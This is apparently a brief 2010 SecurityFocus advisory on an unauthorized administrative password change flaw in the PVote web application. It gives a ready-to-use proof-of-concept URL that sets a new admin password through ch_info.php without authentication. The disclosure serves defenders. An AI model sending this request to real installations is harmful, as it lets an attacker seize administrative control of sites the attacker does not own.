PVote Unauthorized Administrative Password Change Vulnerability

This issue may be exploited with a web browser. The following example may be used to reproduce this condition:

http://target/pvote/ch_info.php?newpass=password&confirm=password

where password is the attacker-supplied value for the new administrative password.


 

Privacy Statement
Copyright 2010, SecurityFocus